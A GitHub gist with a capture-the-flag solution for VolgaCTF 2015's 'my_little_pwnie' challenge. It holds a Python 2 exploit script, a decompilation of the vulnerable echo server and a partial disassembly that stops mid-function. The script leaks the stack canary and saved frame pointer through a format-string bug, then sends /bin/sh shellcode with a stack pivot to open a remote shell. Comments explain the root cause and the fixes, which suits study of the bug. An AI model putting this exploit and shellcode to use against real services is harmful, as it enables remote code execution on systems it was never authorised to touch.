@hhc0null
Last active August 29, 2015 14:20
[VolgaCTF_2015_pwn-my_little_pwnie-250pts]
#!/usr/bin/env python2
import binascii
import re
import socket
import struct
import subprocess
import sys
import telnetlib
import time
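def read_until(f, delim='\n'):
    """Read from *f* one character at a time until the data ends with *delim*.

    Args:
        f: file-like object whose ``read(1)`` returns one character, or an
           empty string once the stream is closed.
        delim: terminator to wait for; it is included in the result. An
           empty delimiter matches immediately and returns ``""``.

    Returns:
        Everything read so far, delimiter included.

    Raises:
        EOFError: the stream ended before *delim* was seen. (Previously an
            empty ``read(1)`` was appended forever and the loop never
            terminated, e.g. when the peer closed the connection.)
    """
    data = ""
    while not data.endswith(delim):
        ch = f.read(1)
        if not ch:
            # "" means EOF; retrying would spin without ever progressing.
            raise EOFError("stream closed before {!r}; read so far: {!r}".format(delim, data))
        data += ch
    return data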
def connect(rhp=("pwnie.2015.volgactf.ru", 7777)):
    """Open a TCP connection to ``rhp`` (host, port).

    Returns the connected socket together with an unbuffered read/write
    file object wrapped around it; the caller owns and closes both.
    """
    sock = socket.create_connection(rhp)
    return sock, sock.makefile('rw', bufsize=0)
def interact(s):
    """Hand the already-connected socket ``s`` to an interactive telnet session.

    Prints a banner, then blocks in ``Telnet.interact()`` until the session ends.
    """
    session = telnetlib.Telnet()
    session.sock = s
    print("[+] 4ll y0U n33D 15 5h3ll!!")
    session.interact()
def p(x, t="<I"):
    """Pack ``x`` with struct format ``t`` (default: little-endian unsigned 32-bit)."""
    packer = struct.Struct(t)
    return packer.pack(x)
def u(x, t="<I"):
    """Unpack bytes ``x`` with struct format ``t`` and return the first field."""
    fields = struct.Struct(t).unpack(x)
    return fields[0]
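def unsigned(x):
    """Return ``x`` reduced to its unsigned 32-bit (two's complement) value.

    ``unsigned(-1) == 0xffffffff``; values already in ``[0, 2**32)`` come
    back unchanged. The previous implementation round-tripped through
    ``struct`` ("<i" then "<I") and therefore raised ``struct.error`` for
    anything outside the signed 32-bit range; masking gives the identical
    result for every input that used to work and is defined for all ints.
    """
    return x & 0xffffffff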
def overwrite(pairs, index=7):
    """Build a printf-style format string made of ``%<width>x%<k>$hn`` groups.

    ``pairs`` is ``(addrs, datas)``: two equal-length lists of 32-bit
    values. ``index`` is the positional argument number at which the start
    of this payload is reachable. Each 32-bit value is split into two
    16-bit halves. On a length mismatch a message goes to stderr and ``""``
    is returned rather than raising. Not called anywhere in this script.
    NOTE(review): ``prev`` is assigned and never read, and the ``else``
    branch below raises ``struct.error`` if ``data`` exceeds 0xffff.
    """
    (addrs, datas) = pairs
    if len(addrs) != len(datas):
        sys.stderr.write("[!] number of `pairs', elements don't be matched in overwrite()\n")
        return ""
    payload = ""
    for addr in addrs:
        # A, A+2, B, B+2, C, C+2, ...
        payload += p(addr) + p(addr+2)
    dataset = map(lambda x: [x&0xffff, (x>>16)&0xffff], datas)
    dataset = sum(dataset, []) # it's a cool technique ;) -- flattens the list of pairs
    num = -len(payload)  # bytes already emitted; widths are computed relative to it
    prev = 0  # unused
    for i, data in enumerate(dataset):
        data += num
        data = unsigned(data) if data < 0 else u(p(data, t="<H"), t="<H")
        payload += "%{}x%{}$hn%{}x".format(data, index+i, (0x10000 - data + num) % 0x10000)
        num = 0
    return payload
def stack_leak(data, write=True):
    """Parse every ``0x``-prefixed token in ``data`` (a ``%p`` dump) into ints.

    ``(nil)`` is read as ``0x0``. With ``write`` set, the values are also
    printed as a list of zero-padded 8-digit hex strings. Returns the ints
    in the order they appear.
    """
    normalized = data.replace('(nil)', '0x0')
    tokens = normalized.split('0x')[1:]
    values = [int('0x' + tok, 16) for tok in tokens]
    if write:
        print(["0x{:08x}".format(v) for v in values])
    return values
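def message(message_type, message_body, value=None):
    """Print a tagged status line.

    Output is ``[<type>] <body>`` or, when a value is given,
    ``[<type>] <body>: 0x<value>`` with the value as 8-digit zero-padded hex.

    Args:
        message_type: short tag shown in brackets (e.g. ``"+"``, ``"*"``).
        message_body: free text.
        value: optional integer to display. Tested with ``is not None`` so
            that ``0`` is still printed; the old truthiness check silently
            dropped a zero value (e.g. a zero address or length).

    Raises:
        ValueError: if ``value`` is not an integer (``{:08x}`` needs one).
    """
    if value is not None:
        text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value)
    else:
        text = "[{}] {}".format(message_type, message_body)
    print(text)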
"""
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Partial RELRO Canary found NX disabled No PIE No RPATH No RUNPATH ../my_little_pwnie
## memo
- base address is fixed.
- we can leak GOT any address.
- %29$p => saved ebp, %30$p => saved eip.
"""
# Root cause, per the decompilation of sub_8048923 below: the client's buffer is
# passed to sprintf() as the *format* string, and the destination (0x78 zeroed
# bytes in the caller's frame) has no length bound. The stack canary does not
# help because the same bug discloses it, and "NX disabled" (checksec above)
# leaves the stack executable. Server-side fixes: snprintf(dst, size, "%s", buf)
# (-Wformat-security warns on the original call), NX, PIE/ASLR, full RELRO.
#
# Frame-layout constants. The disassembly of sub_8048a7f shows the echo buffer
# at -0x9c(%ebp) (+6 for the "Echo: " prefix -> 0x96) and the canary at
# -0x1c(%ebp).
diff_saved_ebp_and_buffer = 0x96
diff_saved_ebp_and_canary = 0x1c
# shellcode(sock reuse): execve("/bin/sh", NULL, NULL);
sc = "\x6a\x05\x5e" # fd = 5;
sc += "\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
# NOTE(review): `rhp` is assigned but never used -- connect() is called with its
# default argument, so this script never talks to localhost as written.
rhp = ("localhost", 7777)
s, f = connect()
# leak canary & saved ebp
payload = "%26$p%29$p" # canary, saved ebp
print read_until(f, ": ")
f.write(payload+'\n')
# stack_leak() returns every 0x-prefixed token on the reply line; unpacking into
# exactly two names raises ValueError on any other reply.
stack = stack_leak(read_until(f))
canary, saved_ebp = stack
message("+", "canary", canary)
message("*", "saved ebp", saved_ebp)
pivot_address = saved_ebp - diff_saved_ebp_and_buffer
message("+", "esp will pivot to", pivot_address)
payload = ""
payload += sc
# 0x96 - 0x1c is the distance from the sprintf() destination to the canary.
padding_bytes = (diff_saved_ebp_and_buffer-diff_saved_ebp_and_canary) - len(payload)
payload += "%{}x".format(padding_bytes)
payload += p(canary) # it'll conatins null-byte.. :(
payload += "AAAA"*2
payload += p(pivot_address)
message("*", "payload length", len(payload))  # message() renders the value as hex
message("+", "payload: {}".format(repr(payload)))
# Input validation via `assert` is stripped under `python -O`. Also, if, as the
# comment above says, p(canary) carries a NUL byte, the first assert fires and
# the script stops here; the steps after it are not verified by this review.
assert not '\0' in payload
assert len(payload) <= 0x3f
f.write(payload)
interact(s)
/* Sends the NUL-terminated string arg_4 on socket arg_0 (send@plt, flags 0).
 * The return value of send() is discarded, so short or failed writes go
 * unnoticed by the callers. */
void sub_80488bd(int arg_0, char *arg_4)
{
    send(arg_0, arg_4, strlen(arg_4), 0);
}
/* Child reaper. The disassembly of main() installs this address (0x80488ee)
 * via sigaction() for signal 0x11, i.e. SIGCHLD. Reaps every exited child
 * without blocking and returns when nothing is left (0) or on error (-1).
 * ebp_0ch is a stack local of the original function. */
void sub_80488ee()
{
    do {
        ebp_0ch = waitpid(WAIT_ANY, NULL, WNOHANG);
    } while(ebp_0ch != 0 && ebp_0ch != -1);
}
/* Reads one request from socket arg_4 into a 0x40-byte stack buffer and
 * echoes it back through arg_0, the caller's "Echo: " buffer.
 *
 * Returns strcmp(buf, "exit") -- 0 makes the caller's loop stop -- or -1
 * when recv() returned 0 (peer closed). A recv() error (-1) is not handled:
 * the still-zeroed buffer is then processed as an empty string. */
int sub_8048923(char *arg_0, int arg_4)
{
    // Local variables.
    char *ebp_5ch;
    int ebp_58h;
    char *ebp_54h;
    int ebp_50h;
    char ebp_4ch[0x40];
    ebp_5ch = arg_0;
    sub_80488bd(arg_4, "Type string to echo back: ");
    memset(ebp_4ch, '\0', 0x40);
    ebp_50h = recv(arg_4, ebp_4ch, 0x3f, 0);  // at most 0x3f bytes, so the last byte stays NUL
    if(ebp_50h == 0) {
        fwrite("Failed to read socket\n", 1, 0x16, stderr);
        return -1;
    }
    ebp_58h = strcmp(ebp_4ch, "exit");  // exact match only: "exit\n" does not quit
    // Blacklist: any input containing 'n' is rejected (this covers the %n
    // family), but every other conversion is still interpreted by sprintf()
    // below, so the input can still read the stack and, through field widths,
    // produce far more than 0x3f bytes of output. strlen() is re-evaluated on
    // each iteration.
    for(ebp_54h = ebp_4ch; ebp_4ch+strlen(ebp_4ch) > ebp_54h; ebp_54h++) {
        if(ebp_54h[0] == 'n') {
            strcpy(ebp_5ch, "I strip this awful symbol\n");
            ebp_58h = 0;  // also ends the caller's loop, closing the connection
            goto loc_8048a57h;
        }
        // ->>
    }
    // Root cause: user-controlled format string with an unbounded destination
    // (the caller zeroes 0x78 bytes after "Echo: ").
    // Fix: snprintf(&ebp_5ch[6], 0x78, "%s", ebp_4ch); -Wformat-security
    // flags the call as written.
    sprintf(&ebp_5ch[6], ebp_4ch); // XXX: FSB
loc_8048a57h:
    sub_80488bd(arg_4, ebp_5ch);
    return ebp_58h;
}
/* Per-connection loop: greets the client on socket arg_0, then calls
 * sub_8048923() until it returns 0.
 *
 * ebp_9ch is a stack buffer holding "Echo: " followed by 0x78 zeroed bytes
 * (the disassembly does the memset as rep stos of 0x1e dwords). It lies
 * below this frame's canary (-0x1c(%ebp)) and saved registers, so an
 * over-long sprintf() in the callee runs into them; the canary is only a
 * defence if it cannot be read first, which the same bug allows. */
int sub_8048a7f(int arg_0)
{
    sub_80488bd(arg_0, "This is a simple echo server. Type exit to quit.\n");
    strcpy(ebp_9ch, "Echo: ");
    memset(&ebp_9ch[6], '\0', 0x78);
    for(ebp_a0h = 1; ebp_a0h != 0; ) {
        ebp_a0h = sub_8048923(ebp_9ch, arg_0);  // strcmp() result, or -1 on closed peer
    }
    return 0;
}
/* Accept loop. The parts elided as "***" are visible only in the disassembly:
 * port from argv[1] via atoi(), SIGCHLD handler sub_80488ee, socket/bind/
 * listen, then accept() in an endless loop. esp_38h is the accepted socket,
 * esp_34h the listener.
 *
 * Each client is served by a forked child that exit()s when done. A crash in
 * a child (e.g. __stack_chk_fail) therefore does not take the service down,
 * and children inherit the parent's address space, including its canary.
 * Mitigations: PIE/ASLR and NX for the binary, and re-exec per connection
 * (or a non-forking design) so that a crash or leak in one session tells an
 * attacker nothing about the next. */
int main()
{
    // ***
    esp_3ch = fork();
    if(esp_3ch == 0) {
        sub_8048a7f(esp_38h);
        close(esp_38h);
        close(esp_34h);
        exit(EXIT_SUCCESS);
    }
    // ***
}
my_little_pwnie: file format elf32-i386
Disassembly of section .init:
080485ec <.init>:
80485ec: 53 push %ebx
80485ed: 83 ec 08 sub $0x8,%esp
80485f0: e8 fb 01 00 00 call 80487f0 <send@plt+0x40>
80485f5: 81 c3 0b 2a 00 00 add $0x2a0b,%ebx
80485fb: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax
8048601: 85 c0 test %eax,%eax
8048603: 74 05 je 804860a <setsockopt@plt-0x16>
8048605: e8 b6 00 00 00 call 80486c0 <__gmon_start__@plt>
804860a: 83 c4 08 add $0x8,%esp
804860d: 5b pop %ebx
804860e: c3 ret
Disassembly of section .plt:
08048610 <setsockopt@plt-0x10>:
8048610: ff 35 04 b0 04 08 pushl 0x804b004
8048616: ff 25 08 b0 04 08 jmp *0x804b008
804861c: 00 00 add %al,(%eax)
...
08048620 <setsockopt@plt>:
8048620: ff 25 0c b0 04 08 jmp *0x804b00c
8048626: 68 00 00 00 00 push $0x0
804862b: e9 e0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048630 <strcmp@plt>:
8048630: ff 25 10 b0 04 08 jmp *0x804b010
8048636: 68 08 00 00 00 push $0x8
804863b: e9 d0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048640 <printf@plt>:
8048640: ff 25 14 b0 04 08 jmp *0x804b014
8048646: 68 10 00 00 00 push $0x10
804864b: e9 c0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048650 <inet_ntoa@plt>:
8048650: ff 25 18 b0 04 08 jmp *0x804b018
8048656: 68 18 00 00 00 push $0x18
804865b: e9 b0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048660 <__stack_chk_fail@plt>:
8048660: ff 25 1c b0 04 08 jmp *0x804b01c
8048666: 68 20 00 00 00 push $0x20
804866b: e9 a0 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048670 <htons@plt>:
8048670: ff 25 20 b0 04 08 jmp *0x804b020
8048676: 68 28 00 00 00 push $0x28
804867b: e9 90 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048680 <accept@plt>:
8048680: ff 25 24 b0 04 08 jmp *0x804b024
8048686: 68 30 00 00 00 push $0x30
804868b: e9 80 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048690 <fwrite@plt>:
8048690: ff 25 28 b0 04 08 jmp *0x804b028
8048696: 68 38 00 00 00 push $0x38
804869b: e9 70 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486a0 <waitpid@plt>:
80486a0: ff 25 2c b0 04 08 jmp *0x804b02c
80486a6: 68 40 00 00 00 push $0x40
80486ab: e9 60 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486b0 <puts@plt>:
80486b0: ff 25 30 b0 04 08 jmp *0x804b030
80486b6: 68 48 00 00 00 push $0x48
80486bb: e9 50 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486c0 <__gmon_start__@plt>:
80486c0: ff 25 34 b0 04 08 jmp *0x804b034
80486c6: 68 50 00 00 00 push $0x50
80486cb: e9 40 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486d0 <exit@plt>:
80486d0: ff 25 38 b0 04 08 jmp *0x804b038
80486d6: 68 58 00 00 00 push $0x58
80486db: e9 30 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486e0 <strlen@plt>:
80486e0: ff 25 3c b0 04 08 jmp *0x804b03c
80486e6: 68 60 00 00 00 push $0x60
80486eb: e9 20 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
080486f0 <__libc_start_main@plt>:
80486f0: ff 25 40 b0 04 08 jmp *0x804b040
80486f6: 68 68 00 00 00 push $0x68
80486fb: e9 10 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048700 <bind@plt>:
8048700: ff 25 44 b0 04 08 jmp *0x804b044
8048706: 68 70 00 00 00 push $0x70
804870b: e9 00 ff ff ff jmp 8048610 <setsockopt@plt-0x10>
08048710 <sigfillset@plt>:
8048710: ff 25 48 b0 04 08 jmp *0x804b048
8048716: 68 78 00 00 00 push $0x78
804871b: e9 f0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048720 <memset@plt>:
8048720: ff 25 4c b0 04 08 jmp *0x804b04c
8048726: 68 80 00 00 00 push $0x80
804872b: e9 e0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048730 <fork@plt>:
8048730: ff 25 50 b0 04 08 jmp *0x804b050
8048736: 68 88 00 00 00 push $0x88
804873b: e9 d0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048740 <listen@plt>:
8048740: ff 25 54 b0 04 08 jmp *0x804b054
8048746: 68 90 00 00 00 push $0x90
804874b: e9 c0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048750 <sprintf@plt>:
8048750: ff 25 58 b0 04 08 jmp *0x804b058
8048756: 68 98 00 00 00 push $0x98
804875b: e9 b0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048760 <atoi@plt>:
8048760: ff 25 5c b0 04 08 jmp *0x804b05c
8048766: 68 a0 00 00 00 push $0xa0
804876b: e9 a0 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048770 <socket@plt>:
8048770: ff 25 60 b0 04 08 jmp *0x804b060
8048776: 68 a8 00 00 00 push $0xa8
804877b: e9 90 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048780 <sigaction@plt>:
8048780: ff 25 64 b0 04 08 jmp *0x804b064
8048786: 68 b0 00 00 00 push $0xb0
804878b: e9 80 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
08048790 <recv@plt>:
8048790: ff 25 68 b0 04 08 jmp *0x804b068
8048796: 68 b8 00 00 00 push $0xb8
804879b: e9 70 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
080487a0 <close@plt>:
80487a0: ff 25 6c b0 04 08 jmp *0x804b06c
80487a6: 68 c0 00 00 00 push $0xc0
80487ab: e9 60 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
080487b0 <send@plt>:
80487b0: ff 25 70 b0 04 08 jmp *0x804b070
80487b6: 68 c8 00 00 00 push $0xc8
80487bb: e9 50 fe ff ff jmp 8048610 <setsockopt@plt-0x10>
Disassembly of section .text:
080487c0 <.text>:
80487c0: 31 ed xor %ebp,%ebp
80487c2: 5e pop %esi
80487c3: 89 e1 mov %esp,%ecx
80487c5: 83 e4 f0 and $0xfffffff0,%esp
80487c8: 50 push %eax
80487c9: 54 push %esp
80487ca: 52 push %edx
80487cb: 68 e0 8e 04 08 push $0x8048ee0
80487d0: 68 70 8e 04 08 push $0x8048e70
80487d5: 51 push %ecx
80487d6: 56 push %esi
80487d7: 68 24 8b 04 08 push $0x8048b24
80487dc: e8 0f ff ff ff call 80486f0 <__libc_start_main@plt>
80487e1: f4 hlt
80487e2: 66 90 xchg %ax,%ax
80487e4: 66 90 xchg %ax,%ax
80487e6: 66 90 xchg %ax,%ax
80487e8: 66 90 xchg %ax,%ax
80487ea: 66 90 xchg %ax,%ax
80487ec: 66 90 xchg %ax,%ax
80487ee: 66 90 xchg %ax,%ax
80487f0: 8b 1c 24 mov (%esp),%ebx
80487f3: c3 ret
80487f4: 66 90 xchg %ax,%ax
80487f6: 66 90 xchg %ax,%ax
80487f8: 66 90 xchg %ax,%ax
80487fa: 66 90 xchg %ax,%ax
80487fc: 66 90 xchg %ax,%ax
80487fe: 66 90 xchg %ax,%ax
8048800: b8 7f b0 04 08 mov $0x804b07f,%eax
8048805: 2d 7c b0 04 08 sub $0x804b07c,%eax
804880a: 83 f8 06 cmp $0x6,%eax
804880d: 77 01 ja 8048810 <send@plt+0x60>
804880f: c3 ret
8048810: b8 00 00 00 00 mov $0x0,%eax
8048815: 85 c0 test %eax,%eax
8048817: 74 f6 je 804880f <send@plt+0x5f>
8048819: 55 push %ebp
804881a: 89 e5 mov %esp,%ebp
804881c: 83 ec 18 sub $0x18,%esp
804881f: c7 04 24 7c b0 04 08 movl $0x804b07c,(%esp)
8048826: ff d0 call *%eax
8048828: c9 leave
8048829: c3 ret
804882a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8048830: b8 7c b0 04 08 mov $0x804b07c,%eax
8048835: 2d 7c b0 04 08 sub $0x804b07c,%eax
804883a: c1 f8 02 sar $0x2,%eax
804883d: 89 c2 mov %eax,%edx
804883f: c1 ea 1f shr $0x1f,%edx
8048842: 01 d0 add %edx,%eax
8048844: d1 f8 sar %eax
8048846: 75 01 jne 8048849 <send@plt+0x99>
8048848: c3 ret
8048849: ba 00 00 00 00 mov $0x0,%edx
804884e: 85 d2 test %edx,%edx
8048850: 74 f6 je 8048848 <send@plt+0x98>
8048852: 55 push %ebp
8048853: 89 e5 mov %esp,%ebp
8048855: 83 ec 18 sub $0x18,%esp
8048858: 89 44 24 04 mov %eax,0x4(%esp)
804885c: c7 04 24 7c b0 04 08 movl $0x804b07c,(%esp)
8048863: ff d2 call *%edx
8048865: c9 leave
8048866: c3 ret
8048867: 89 f6 mov %esi,%esi
8048869: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
8048870: 80 3d 80 b0 04 08 00 cmpb $0x0,0x804b080
8048877: 75 13 jne 804888c <send@plt+0xdc>
8048879: 55 push %ebp
804887a: 89 e5 mov %esp,%ebp
804887c: 83 ec 08 sub $0x8,%esp
804887f: e8 7c ff ff ff call 8048800 <send@plt+0x50>
8048884: c6 05 80 b0 04 08 01 movb $0x1,0x804b080
804888b: c9 leave
804888c: f3 c3 repz ret
804888e: 66 90 xchg %ax,%ax
8048890: a1 10 af 04 08 mov 0x804af10,%eax
8048895: 85 c0 test %eax,%eax
8048897: 74 1f je 80488b8 <send@plt+0x108>
8048899: b8 00 00 00 00 mov $0x0,%eax
804889e: 85 c0 test %eax,%eax
80488a0: 74 16 je 80488b8 <send@plt+0x108>
80488a2: 55 push %ebp
80488a3: 89 e5 mov %esp,%ebp
80488a5: 83 ec 18 sub $0x18,%esp
80488a8: c7 04 24 10 af 04 08 movl $0x804af10,(%esp)
80488af: ff d0 call *%eax
80488b1: c9 leave
80488b2: e9 79 ff ff ff jmp 8048830 <send@plt+0x80>
80488b7: 90 nop
80488b8: e9 73 ff ff ff jmp 8048830 <send@plt+0x80>
void sub_80488bd(int arg_0, char *arg_4)
{
80488bd: 55 push %ebp
80488be: 89 e5 mov %esp,%ebp
80488c0: 83 ec 18 sub $0x18,%esp
80488c3: 8b 45 0c mov 0xc(%ebp),%eax
80488c6: 89 04 24 mov %eax,(%esp)
80488c9: e8 12 fe ff ff call 80486e0 <strlen@plt>
80488ce: c7 44 24 0c 00 00 00 movl $0x0,0xc(%esp)
80488d5: 00
80488d6: 89 44 24 08 mov %eax,0x8(%esp)
80488da: 8b 45 0c mov 0xc(%ebp),%eax
80488dd: 89 44 24 04 mov %eax,0x4(%esp)
80488e1: 8b 45 08 mov 0x8(%ebp),%eax
80488e4: 89 04 24 mov %eax,(%esp)
80488e7: e8 c4 fe ff ff call 80487b0 <send@plt>
send(arg_0, arg_4, strlen(arg_4), 0);
80488ec: c9 leave
80488ed: c3 ret
}
void sub_80488ee()
{
80488ee: 55 push %ebp
80488ef: 89 e5 mov %esp,%ebp
80488f1: 83 ec 28 sub $0x28,%esp
do {
80488f4: c7 44 24 08 01 00 00 movl $0x1,0x8(%esp)
80488fb: 00
80488fc: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048903: 00
8048904: c7 04 24 ff ff ff ff movl $0xffffffff,(%esp)
804890b: e8 90 fd ff ff call 80486a0 <waitpid@plt>
8048910: 89 45 f4 mov %eax,-0xc(%ebp)
ebp_0ch = waitpid(WAIT_ANY, NULL, WNOHANG);
8048913: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
8048917: 74 08 je 8048921 <send@plt+0x171>
8048919: 83 7d f4 ff cmpl $0xffffffff,-0xc(%ebp)
804891d: 74 02 je 8048921 <send@plt+0x171>
804891f: eb d3 jmp 80488f4 <send@plt+0x144>
} while(ebp_0ch != 0 && ebp_0ch != -1);
8048921: c9 leave
8048922: c3 ret
}
int sub_8048923(arg_0, arg_4)
{
8048923: 55 push %ebp
8048924: 89 e5 mov %esp,%ebp
8048926: 83 ec 78 sub $0x78,%esp
// Local variables.
char *ebp_5ch;
8048929: 8b 45 08 mov 0x8(%ebp),%eax
804892c: 89 45 a4 mov %eax,-0x5c(%ebp)
ebp_5ch = arg_0;
804892f: 65 a1 14 00 00 00 mov %gs:0x14,%eax
8048935: 89 45 f4 mov %eax,-0xc(%ebp)
8048938: 31 c0 xor %eax,%eax
804893a: c7 44 24 04 00 8f 04 movl $0x8048f00,0x4(%esp)
8048941: 08
8048942: 8b 45 0c mov 0xc(%ebp),%eax
8048945: 89 04 24 mov %eax,(%esp)
8048948: e8 70 ff ff ff call 80488bd <send@plt+0x10d>
sub_80488bd(arg_4, "Type string to echo back: ");
804894d: c7 44 24 08 40 00 00 movl $0x40,0x8(%esp)
8048954: 00
8048955: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
804895c: 00
804895d: 8d 45 b4 lea -0x4c(%ebp),%eax
8048960: 89 04 24 mov %eax,(%esp)
8048963: e8 b8 fd ff ff call 8048720 <memset@plt>
memset(ebp_4ch, '\0', 0x40);
8048968: c7 44 24 0c 00 00 00 movl $0x0,0xc(%esp)
804896f: 00
8048970: c7 44 24 08 3f 00 00 movl $0x3f,0x8(%esp)
8048977: 00
8048978: 8d 45 b4 lea -0x4c(%ebp),%eax
804897b: 89 44 24 04 mov %eax,0x4(%esp)
804897f: 8b 45 0c mov 0xc(%ebp),%eax
8048982: 89 04 24 mov %eax,(%esp)
8048985: e8 06 fe ff ff call 8048790 <recv@plt>
804898a: 89 45 b0 mov %eax,-0x50(%ebp)
ebp_50h = recv(arg_4, ebp_4ch, 0x3f, 0);
804898d: 83 7d b0 00 cmpl $0x0,-0x50(%ebp)
8048991: 75 2f jne 80489c2 <send@plt+0x212>
if(ebp_50h == 0) {
8048993: a1 7c b0 04 08 mov 0x804b07c,%eax
8048998: 89 44 24 0c mov %eax,0xc(%esp)
804899c: c7 44 24 08 16 00 00 movl $0x16,0x8(%esp)
80489a3: 00
80489a4: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
80489ab: 00
80489ac: c7 04 24 1b 8f 04 08 movl $0x8048f1b,(%esp)
80489b3: e8 d8 fc ff ff call 8048690 <fwrite@plt>
fwrite("Failed to read socket\n", 1, 0x16, stderr);
80489b8: b8 ff ff ff ff mov $0xffffffff,%eax
80489bd: e9 aa 00 00 00 jmp 8048a6c <send@plt+0x2bc>
return -1;
}
80489c2: c7 44 24 04 32 8f 04 movl $0x8048f32,0x4(%esp)
80489c9: 08
80489ca: 8d 45 b4 lea -0x4c(%ebp),%eax
80489cd: 89 04 24 mov %eax,(%esp)
80489d0: e8 5b fc ff ff call 8048630 <strcmp@plt>
80489d5: 89 45 a8 mov %eax,-0x58(%ebp)
ebp_58h = strcmp(ebp_4ch, "exit");
80489d8: 8d 45 b4 lea -0x4c(%ebp),%eax
80489db: 89 45 ac mov %eax,-0x54(%ebp)
80489de: eb 4d jmp 8048a2d <send@plt+0x27d>
for(ebp_54h = ebp_4ch; ebp_4ch+strlen(ebp_4ch) > ebp_54h; ebp_54h++) {
80489e0: 8b 45 ac mov -0x54(%ebp),%eax
80489e3: 0f b6 00 movzbl (%eax),%eax
80489e6: 3c 6e cmp $0x6e,%al
80489e8: 75 3f jne 8048a29 <send@plt+0x279>
if(ebp_54h[0] == 'n') {
80489ea: 8b 45 a4 mov -0x5c(%ebp),%eax
80489ed: c7 00 49 20 73 74 movl $0x74732049,(%eax)
80489f3: c7 40 04 72 69 70 20 movl $0x20706972,0x4(%eax)
80489fa: c7 40 08 74 68 69 73 movl $0x73696874,0x8(%eax)
8048a01: c7 40 0c 20 61 77 66 movl $0x66776120,0xc(%eax)
8048a08: c7 40 10 75 6c 20 73 movl $0x73206c75,0x10(%eax)
8048a0f: c7 40 14 79 6d 62 6f movl $0x6f626d79,0x14(%eax)
8048a16: 66 c7 40 18 6c 0a movw $0xa6c,0x18(%eax)
8048a1c: c6 40 1a 00 movb $0x0,0x1a(%eax)
strcpy(ebp_5ch, "I strip this awful symbol\n");
8048a20: c7 45 a8 00 00 00 00 movl $0x0,-0x58(%ebp)
ebp_58h = 0;
8048a27: eb 2e jmp 8048a57 <send@plt+0x2a7>
goto loc_8048a57h;
}
8048a29: 83 45 ac 01 addl $0x1,-0x54(%ebp)
// ->>
8048a2d: 8d 45 b4 lea -0x4c(%ebp),%eax
8048a30: 89 04 24 mov %eax,(%esp)
8048a33: e8 a8 fc ff ff call 80486e0 <strlen@plt>
8048a38: 8d 55 b4 lea -0x4c(%ebp),%edx
8048a3b: 01 d0 add %edx,%eax
8048a3d: 3b 45 ac cmp -0x54(%ebp),%eax
8048a40: 77 9e ja 80489e0 <send@plt+0x230>
}
8048a42: 8b 45 a4 mov -0x5c(%ebp),%eax
8048a45: 8d 50 06 lea 0x6(%eax),%edx
8048a48: 8d 45 b4 lea -0x4c(%ebp),%eax
8048a4b: 89 44 24 04 mov %eax,0x4(%esp)
8048a4f: 89 14 24 mov %edx,(%esp)
8048a52: e8 f9 fc ff ff call 8048750 <sprintf@plt>
sprintf(&ebp_5ch[6], ebp_4ch);
loc_8048a57h:
8048a57: 8b 45 a4 mov -0x5c(%ebp),%eax
8048a5a: 89 44 24 04 mov %eax,0x4(%esp)
8048a5e: 8b 45 0c mov 0xc(%ebp),%eax
8048a61: 89 04 24 mov %eax,(%esp)
8048a64: e8 54 fe ff ff call 80488bd <send@plt+0x10d>
sub_80488bd(arg_4, ebp_5ch);
8048a69: 8b 45 a8 mov -0x58(%ebp),%eax
8048a6c: 8b 4d f4 mov -0xc(%ebp),%ecx
8048a6f: 65 33 0d 14 00 00 00 xor %gs:0x14,%ecx
8048a76: 74 05 je 8048a7d <send@plt+0x2cd>
8048a78: e8 e3 fb ff ff call 8048660 <__stack_chk_fail@plt>
8048a7d: c9 leave
8048a7e: c3 ret
return ebp_58h;
}
sub_8048a7f(int arg_0)
{
8048a7f: 55 push %ebp
8048a80: 89 e5 mov %esp,%ebp
8048a82: 57 push %edi
8048a83: 56 push %esi
8048a84: 53 push %ebx
8048a85: 81 ec ac 00 00 00 sub $0xac,%esp
8048a8b: 65 a1 14 00 00 00 mov %gs:0x14,%eax
8048a91: 89 45 e4 mov %eax,-0x1c(%ebp)
8048a94: 31 c0 xor %eax,%eax
8048a96: c7 44 24 04 38 8f 04 movl $0x8048f38,0x4(%esp)
8048a9d: 08
8048a9e: 8b 45 08 mov 0x8(%ebp),%eax
8048aa1: 89 04 24 mov %eax,(%esp)
8048aa4: e8 14 fe ff ff call 80488bd <send@plt+0x10d>
sub_80488bd(arg_0, "This is a simple echo server. Type exit to quit.\n");
8048aa9: c7 85 64 ff ff ff 45 movl $0x6f686345,-0x9c(%ebp)
8048ab0: 63 68 6f
8048ab3: c7 85 68 ff ff ff 3a movl $0x203a,-0x98(%ebp)
